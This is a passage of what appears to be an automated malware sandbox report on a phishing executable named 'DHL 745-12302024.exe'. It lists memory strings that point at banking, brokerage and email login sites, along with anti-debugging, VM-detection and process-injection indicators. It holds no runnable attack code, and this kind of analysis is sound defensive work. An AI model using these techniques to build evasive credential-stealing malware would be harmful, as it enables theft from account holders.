Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: F56GKLK7U4.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: netbtugc.exe, 00000004.00000002.3875628569.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: F56GKLK7U4.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: F56GKLK7U4.4.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3876157760.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: F56GKLK7U4.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: F56GKLK7U4.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0307096E rdtsc

2_2_0307096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_02617823 LdrLoadDll,

2_2_02617823

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00ADEAA2 BlockInput,

0_2_00ADEAA2

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00A92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00A92622

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00A642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A642DE

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A84CE8 mov eax, dword ptr fs:[00000030h]	0_2_00A84CE8
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_0168E538 mov eax, dword ptr fs:[00000030h]	0_2_0168E538
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_0168FB28 mov eax, dword ptr fs:[00000030h]	0_2_0168FB28
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_0168FB88 mov eax, dword ptr fs:[00000030h]	0_2_0168FB88
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]	2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]	2_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]	2_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]	2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h]	2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]	2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]	2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]	2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]	2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]	2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]	2_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310634F mov eax, dword ptr fs:[00000030h]	2_2_0310634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]	2_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]	2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]	2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]	2_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]	2_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]	2_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]	2_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]	2_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]	2_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]	2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]	2_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]	2_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]	2_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]	2_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]	2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]	2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310625D mov eax, dword ptr fs:[00000030h]	2_2_0310625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]	2_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]	2_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]	2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]	2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]	2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]	2_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]	2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]	2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]	2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]	2_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]	2_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]	2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h]	2_2_031062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]	2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]	2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]	2_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]	2_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]	2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]	2_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]	2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]	2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]	2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]	2_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]	2_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]	2_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]	2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]	2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]	2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]	2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]	2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]	2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]	2_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]	2_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]	2_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]	2_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]	2_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]	2_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]	2_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]	2_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]	2_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]	2_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]	2_2_030280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]	2_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]	2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]	2_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]	2_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]	2_2_030B60E0
